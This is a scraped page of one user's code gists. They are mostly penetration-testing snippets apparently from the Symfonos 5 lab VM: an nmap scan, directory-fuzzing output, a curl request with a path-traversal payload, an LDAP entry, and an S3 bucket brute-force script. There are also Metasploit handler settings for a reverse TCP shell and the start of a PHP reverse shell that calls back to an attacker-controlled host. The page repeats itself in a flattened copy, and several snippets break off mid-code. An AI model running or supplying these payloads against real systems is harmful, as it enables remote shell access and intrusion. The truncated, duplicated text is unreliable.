Moos1e

## gist:156e4c1236a6721e8a9724e0b6a7cf4f
#!/usr/bin/python


while True:
    try:
        age = input("what is youre age?")
    except NameError:
        print('Please use numeric digits.')
    if age < 1:

## Symfonos 5 scan
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfhCNEk87fJIphggJ/K7+9vu2pm9OmRmuYZ4tIPDCr42LgzGp6EIWpz5FXo98F1iq1pNASEjcMqqpCxuhhOFSlf3pPA00Rka4/0pmlmtIl5jSE6cpexIXzINzLC6YXDt59JFuOi0PgsbBYbIWsRdNxPboBDELeilgNairkx3wakNr39Di1SmrpQyQ54EbpusuNZPZL9eBjgEScXrx+MCnA4gyQ+VwEbMXDBfC6q5zO+poZQ1wkAqg9+LFvd2RuwGB+06yFfVn84UpBh4Fxf+cpnKG0zJalRfI8ZhUgnvEnU7cIp8Yb94pUzXf1+m1Vsau8+0myI0aaljHt4RfSfI3T
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHUvkrh2jAIVELCTy59BYzC3B0S4/jKkYOmS6N7anjrxvHW59thSrs7+3pvVhM5X0Og+FV4zkrMMfvw5jwTygeA=
|   256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKxA6/wOoEAbxcDJX8zdCYFQzulYfpxK4n4e7bUSUeeC
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:

## symfonos fuzzing
Target: http://192.168.1.11/FUZZ.php
Total requests: 950

==================================================================
ID	Response   Lines      Word         Chars          Payload
==================================================================

000060:  C=200     39 L	      79 W	   1650 Ch	  "admin"
000415:  C=302     28 L	      61 W	    962 Ch	  "home"
000505:  C=302      0 L	       0 W	      0 Ch	  "logout"

## symfonos curl
curl -i -s -k  -X $'GET' -H $'Host: 192.168.1.11' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=2j1n0gb5kioc4soqh429s7brah' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -b $'PHPSESSID=2j1n0gb5kioc4soqh429s7brah' $'http://192.168.1.11/home.php?url=../../../../var/www/html/admin.php'

## symfonos zeus
# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus

## Bash S3 Bucket
#!/bin/bash
while read F ; do
    count=$(curl $1/$F -s | grep -E "NoSuchBucket|InvalidBucketName" |wc -l)
    if [[ $count -eq 0 ]]
    then
   	    echo "Bucket Found: "$F
    fi
done < $2

## AWS_Hello_World
#!/usr/bin/python

statement = "Hello World"

if statement == "Hello World":
   print statement
else:
   print"That statement is not correct"

## Payload parameters for Lambda and Metasploit
$ use exploit/multi/handler
$ set payload generic/shell_reverse_tcp
$ set lhost {set this to your kali DNS name}
$ set lport {set this to the port in your lambda function}
$ run

## PHP Shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '<Kali Public DNS>';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
	#!/usr/bin/python



	while True:
	try:
	age = input("what is youre age?")
	except NameError:
	print('Please use numeric digits.')
	if age < 1:
	22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
	\| ssh-hostkey:
	\| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
	\| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfhCNEk87fJIphggJ/K7+9vu2pm9OmRmuYZ4tIPDCr42LgzGp6EIWpz5FXo98F1iq1pNASEjcMqqpCxuhhOFSlf3pPA00Rka4/0pmlmtIl5jSE6cpexIXzINzLC6YXDt59JFuOi0PgsbBYbIWsRdNxPboBDELeilgNairkx3wakNr39Di1SmrpQyQ54EbpusuNZPZL9eBjgEScXrx+MCnA4gyQ+VwEbMXDBfC6q5zO+poZQ1wkAqg9+LFvd2RuwGB+06yFfVn84UpBh4Fxf+cpnKG0zJalRfI8ZhUgnvEnU7cIp8Yb94pUzXf1+m1Vsau8+0myI0aaljHt4RfSfI3T
	\| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
	\| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHUvkrh2jAIVELCTy59BYzC3B0S4/jKkYOmS6N7anjrxvHW59thSrs7+3pvVhM5X0Og+FV4zkrMMfvw5jwTygeA=
	\| 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
	\|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKxA6/wOoEAbxcDJX8zdCYFQzulYfpxK4n4e7bUSUeeC
	80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
	\| http-methods:
	Target: http://192.168.1.11/FUZZ.php
	Total requests: 950

	==================================================================
	ID Response Lines Word Chars Payload
	==================================================================

	000060: C=200 39 L 79 W 1650 Ch "admin"
	000415: C=302 28 L 61 W 962 Ch "home"
	000505: C=302 0 L 0 W 0 Ch "logout"
	# zeus, symfonos.local
	dn: uid=zeus,dc=symfonos,dc=local
	uid: zeus
	cn: zeus
	sn: 3
	objectClass: top
	objectClass: posixAccount
	objectClass: inetOrgPerson
	loginShell: /bin/bash
	homeDirectory: /home/zeus
	#!/bin/bash
	while read F ; do
	count=$(curl $1/$F -s \| grep -E "NoSuchBucket\|InvalidBucketName" \|wc -l)
	if [[ $count -eq 0 ]]
	then
	echo "Bucket Found: "$F
	fi
	done < $2
	#!/usr/bin/python

	statement = "Hello World"

	if statement == "Hello World":
	print statement
	else:
	print"That statement is not correct"
	$ use exploit/multi/handler
	$ set payload generic/shell_reverse_tcp
	$ set lhost {set this to your kali DNS name}
	$ set lport {set this to the port in your lambda function}
	$ run
	<?php
	set_time_limit (0);
	$VERSION = "1.0";
	$ip = '<Kali Public DNS>'; // CHANGE THIS
	$port = 443; // CHANGE THIS
	$chunk_size = 1400;
	$write_a = null;
	$error_a = null;
	$shell = 'uname -a; w; id; /bin/sh -i';
	$daemon = 0;